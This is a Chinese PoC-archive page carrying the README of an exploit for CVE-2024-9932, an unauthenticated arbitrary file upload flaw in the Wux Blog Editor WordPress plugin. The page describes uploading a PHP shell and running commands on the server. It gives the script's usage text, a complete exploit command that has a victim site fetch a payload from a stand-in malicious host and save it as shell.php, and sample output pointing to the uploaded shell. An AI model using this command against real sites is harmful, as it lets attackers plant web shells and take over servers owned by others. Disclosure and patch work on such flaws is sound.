POC详情: ef38f52d2cf94e8baad793befffe73dfe3159b07

来源
关联漏洞
标题: WordPress plugin Wux Blog Editor 代码问题漏洞 (CVE-2024-9932)
描述:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin Wux Blog Editor 3.0.0版本及之前版本存在代码问题漏洞,该漏洞源于文件类型验证不足,导致任意文件上传。
介绍
# CVE-2024-9932-POC


# Description:
The Wux Blog Editor WordPress plugin is vulnerable to arbitrary file uploads due to insufficient file type validation in the wuxbt_insertImageNew function. Versions up to and including 3.0.0 are affected. This vulnerability allows unauthenticated attackers to upload arbitrary files to the server, potentially leading to remote code execution (RCE).

## Vulnerability Details

The vulnerability stems from improper file type validation in the wuxbt_insertImageNew function. This allows attackers to upload malicious files to the server without authentication.

Attack Scenario:

    Attacker identifies a website using the vulnerable plugin.
    Exploits the file upload functionality to upload a malicious PHP shell.
    Executes commands on the compromised server.
    

###   Usage
```
usage:CVE-2024-9932.py [-h] -u URL -ur REMOTE_URL [-n NAME]

Wux Blog Editor - Arbitrary File Upload

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Base URL of the WordPress server, e.g., http://192.168.100.74/wordpress
  -ur REMOTE_URL,       --remote-url REMOTE_URL
                        Remote file URL, e.g., http://192.168.100.54/shell.txt
  -n NAME, --name NAME  Desired file name, e.g., Nxploit.php

```
# Exploit command
```
python CVE-2024-9932.py -u http://victim-site.com/wordpress -ur http://malicious.com/payload.txt -n shell.php
```
### Results
Successful Upload Example

1- File Found:

2- Execution Result: Navigate to the file's URL to execute the payload.
```
[+] File found: http://192.168.100.74/wordpress/wp-content/uploads/2025/01/shell.php

```


### Disclaimer
This tool is for educational purposes only. Unauthorized use of this script on systems without permission is illegal.



文件快照

[4.0K] /data/pocs/ef38f52d2cf94e8baad793befffe73dfe3159b07 ├── [5.4K] CVE-2024-9932.py └── [1.7K] README.md 0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。